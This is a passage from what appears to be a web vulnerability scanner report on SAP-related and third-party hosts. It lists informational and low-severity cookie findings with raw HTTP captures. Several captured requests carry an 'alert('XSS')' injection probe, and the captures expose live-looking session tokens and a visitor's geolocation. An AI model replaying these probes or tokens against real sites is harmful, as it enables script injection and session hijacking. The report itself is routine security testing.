Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|

{"method":"GetCodeTranslationsByParentCategoryWithLocaleID","arguments":[1,"",2,1033]}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:32 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:32 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:31 GMT
Content-Length: 36

"new Array(1,'',2,1033,new Array())"
11.69. https://www.sap.com/sme/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/contactsap/index.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/search/search-results.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:25 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:25 GMT
Content-Length: 87585


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
11.70. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/webcontent/uuid/a039063f-0894-2b10-ef89-c40583db85cd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/go/portal/prtroot/docs/webcontent/uuid/a039063f-0894-2b10-ef89-c40583db85cd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /irj/scn/go/portal/prtroot/docs/webcontent/uuid/a039063f-0894-2b10-ef89-c40583db85cd HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: image/gif
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
SDN_RES_KEY: /webcontent/uuid/a039063f-0894-2b10-ef89-c40583db85cd
Content-Length: 379
Content-Disposition: inline; filename="button_getthis.gif"
Cache-Control: max-age=129600
Date: Sat, 15 Oct 2011 14:24:02 GMT
Connection: close
Set-Cookie: saplb_*=(J2EE3414700)3414750; Version=1; Path=/; HttpOnly
Set-Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; Domain=.sdn.sap.com; Expires=Thu, 02-Nov-2079 17:38:09 GMT; Path=/
Set-Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; Domain=www.sdn.sap.com; Path=/irj/scn
Set-Cookie: PortalAlias=scn; Path=/
Set-Cookie: JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; Version=1; Path=/; HttpOnly
Set-Cookie: SDNSTATE=392433836.14340.0000; path=/

GIF89aB......x.....Yx.0ASo........^.......o.....i........@Vn...............n.....n..........................!.......,....B.......%.di.h..l..ouU2!....$a.....+.d4.M6.....EBAE...t;.X...e..(/.Js.0,D..I..
...[SNIP]...
11.71. https://www.sme.sap.com/irj/sme/cpslogon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/cpslogon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /irj/sme/cpslogon?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response

HTTP/1.1 302 Moved Temporarily
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/plain
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==
Location: https://www.sme.sap.com:443/irj/sme/logon
Content-Length: 0
Date: Sat, 15 Oct 2011 14:32:52 GMT
Connection: keep-alive
Set-Cookie: saplb_*=(J2EE3417600)3417650; Version=1; Path=/; HttpOnly; secure
Set-Cookie: Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; Domain=.sme.sap.com; Expires=Thu, 02-Nov-2079 17:46:59 GMT; Path=/; secure
Set-Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; Domain=www.sme.sap.com; Path=/irj/sme; secure
Set-Cookie: PortalAlias=sme; Path=/; secure
Set-Cookie: PortalAlias=sme; Path=/; secure
Set-Cookie: JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; Version=1; Path=/; HttpOnly; secure
Set-Cookie: SDNSTATE=526651564.14340.0000; path=/

12. Cookie without HttpOnly flag set  previous  next
There are 150 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

12.1. http://ecohub.sap.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ecohub.sap.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP LJS 1.0.0
SDN_UID: Guest
SDN_RES_KEY: /frontend/
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:07 GMT
Content-Length: 26688
Connection: close
Set-Cookie: rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html class="ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]
...[SNIP]...
12.2. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318688284995-134874&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&profile.geo_ip=50.23.123.106&profile.geo_zip=05672&profile.geo_gmt_offset=-400&profile.geo_country=usa&profile.geo_country_code=840&profile.geo_region=vt&profile.geo_region_code=46&profile.geo_city=stowe&profile.geo_city_code=7029&mbox=omniTargetingInfo&mboxId=0&mboxTime=1318670286143&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%25ONLOAD%3Dalert('XSS')&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 302 Moved Temporarily
Server: Test & Target
P3P: CP="NOI DSP CURa OUR STP COM"
Date: Sat, 15 Oct 2011 14:17:46 GMT
Location: http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686440062-338730&mboxPC=1318631777052-118529.19&mboxPage=1318688284995-134874&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&profile.geo_ip=50.23.123.106&profile.geo_zip=05672&profile.geo_gmt_offset=-400&profile.geo_country=usa&profile.geo_country_code=840&profile.geo_region=vt&profile.geo_region_code=46&profile.geo_city=stowe&profile.geo_city_code=7029&mbox=omniTargetingInfo&mboxId=0&mboxTime=1318670286143&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%25ONLOAD%3Dalert('XSS')&mboxReferrer=&mboxVersion=40&mboxXDomainCheck=true
Set-Cookie: mboxSession=1318686440062-338730; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sat, 15-Oct-2011 14:48:47 GMT; Path=/m2/omnituremarketing
Content-Length: 0

12.3. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686446356-232585&mboxFactoryId=staging&mboxPC=1318631787015-280970.19&mboxPage=1318688291251-567781&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging&mboxId=0&mboxTime=1318670291396&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%25ONLOAD%3Dalert('XSS')&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omniturestaging.staging.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631787015-280970.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 302 Moved Temporarily
Server: Test & Target
P3P: CP="NOI DSP CURa OUR STP COM"
Date: Sat, 15 Oct 2011 14:17:52 GMT
Location: http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318686446356-232585&mboxFactoryId=staging&mboxPC=1318631787015-280970.19&mboxPage=1318688291251-567781&screenHeight=1200&screenWidth=1920&browserWidth=1326&browserHeight=890&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging&mboxId=0&mboxTime=1318670291396&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%25ONLOAD%3Dalert('XSS')&mboxReferrer=&mboxVersion=40&mboxXDomainCheck=true
Set-Cookie: mboxSession=1318686446356-232585; Domain=omniturestaging.staging.tt.omtrdc.net; Expires=Sat, 15-Oct-2011 14:48:52 GMT; Path=/m2/omniturestaging
Content-Length: 0

12.4. https://s.analytics.yahoo.com/fpc.pl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://s.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fpc.pl?a=10002109824374&v=4.47&enc=utf-8&f=https%3A//www.sap.com/sme/contactsap/index.epx&b=Contact%20SAP&c=sme&x=07&cf3=Contact_General&cf4=Contact_General&cf17=Global&e=http%3A//burp/show/12&flv=WIN%2010%2C3%2C183%2C10&d=Sat%2C%2015%20Oct%202011%2015%3A15%3A41%20UTC&n=5&g=en-us&h=Y&j=1920x1200&k=16&l=true&ittidx=0&fpc=M7bgHDDi%7CKd30fNBLaa%7Cfses10002109824374%3D%7CKd30fNBLaa%7CM7bgHDDi%7Cfvis10002109824374%3DZj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA%3D%3D%7C8M8o0780sT%7C8M8o0780sT%7C8M8o0780sT%7C8%7C8M8o0780sT%7C8M8o0780sT HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: s.analytics.yahoo.com
Connection: Keep-Alive
Cookie: B=bbb07qp77cca3&b=3&s=p1; itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|M|8M8o0780Hs|T; itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:15:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|T|8M8o078HsM|T; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=; path=/; domain=.analytics.yahoo.com
TS: 0 205 dc4_ird
Pragma: no-cache
Expires: Sat, 15 Oct 2011 15:15:24 GMT
Cache-Control: no-cache, private, must-revalidate
Content-Length: 45
Accept-Ranges: bytes
Tracking-Status: fpc site tracked
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript

// First Party Cookies
// TS: 0 205 dc4_ird

12.5. http://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: LivePersonID=LP i=546022977410,d=1312768968

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:21:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 46014
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQCCBTRAB=CFBDIKJAAIHFDFFNKLJIOGLN; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=l
...[SNIP]...
12.6. http://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=estore&default=simpleDeploy HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDSABCBTCA=JPCIGIDCLHAIHDGJNIENHOAB

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:55:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 17219
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQCABQQRB=EBGGFGDCPMICBBDEMEBPNMOO; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=l
...[SNIP]...
12.7. http://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=estore&default=simpleDeploy HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDSABCBTCA=JPCIGIDCLHAIHDGJNIENHOAB

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:30:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 17219
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQACDCRRT=MLHMCGDCIEHBHMBPNCOHAJCD; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=l
...[SNIP]...
12.8. http://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
